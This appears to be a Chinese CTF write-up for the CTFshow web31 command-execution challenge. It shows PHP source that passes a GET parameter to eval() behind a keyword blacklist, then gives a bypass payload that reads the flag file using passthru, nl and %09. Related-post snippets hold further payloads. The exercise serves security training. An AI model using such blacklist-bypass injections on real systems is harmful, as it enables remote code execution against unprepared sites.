查看源码

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

发现cat被过滤 可以用more less 还有 nl 绕过 空格被过滤可以用%09绕过
?c=passthru(“nl%09f*”);
获得flag

CTFshow 命令执行 web31相关推荐

1. CTFshow——命令执行

   CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...

2. CTFshow命令执行29-123

   命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令 本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...

3. CTFshow 命令执行 web72

   目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

4. [CTFSHOW]命令执行

   文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...

5. ctfshow命令执行篇

   web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用 用文件包含 其实这个做法也是靠刷题经验猜flag路径 c=includ ...

6. ctfshow命令执行（持续更新，已更至web39）

   做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...

7. ctfshow 命令执行 web29-web77 web118-122 web124 wp

   南神博客 文章目录 命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...

8. [CTFSHOW]命令执行55-74

   web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...

9. CTFshow 命令执行 web56

   目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

最新文章

1. Struts框架的入门使用
2. Docker 17.12.0 发布
3. 用SQL进行用户留存率计算
4. DOCX file format element list
5. [深度学习] 自然语言处理 --- ALBERT 介绍
6. 基于Doxygen的C/C++注释原则
7. Codeigniter分页类代码实例
8. java 获取年 两位,java使用jxl读取日期年份只显示前两位的解决方法
9. “跳过更新”还得付费？Docker 新变化引发群嘲
10. ENVI5.3.1使用Landsat 8影像进行典型地物光谱简单分析实例操作
11. 用WinRAR加密压缩文件
12. Java 进制转换函数
13. 本地词库翻译php,有道词典词库（您也可以轻松翻译离线的有道词典词库）
14. 立体视觉：合成数据集的解析与工具
15. Swift编程二十四（不透明类型）
16. Git让你从入门到精通，看这一篇就够了！
17. spring oauth2 的error_description本地提示中文，线上提示英文。
18. 关于采样率位深码率无损的一些心得
19. Mysql 备份工具XtraBackup全量备份
20. 什么是大数据？常用的大数据框架

热门文章

1. Android AES加密算法，现在实际上
2. ZOJ 2587 Unique Attack
3. android7.1 动态申请权限改为默认授权，修改PackageManagerService.java下的grantPermissions为true
4. Jmeter 在 beanshell 脚本中写日志
5. HashSet源码分析
6. 记一笔冒泡排序和对它的优化
7. LinkedIn公司采用超大规模数据中心设计
8. java.两个例子充分阐述多态的可拓展性
9. Spring Aop 日志管理及配置文件的详细配置
10. 数据结构与算法分析——引论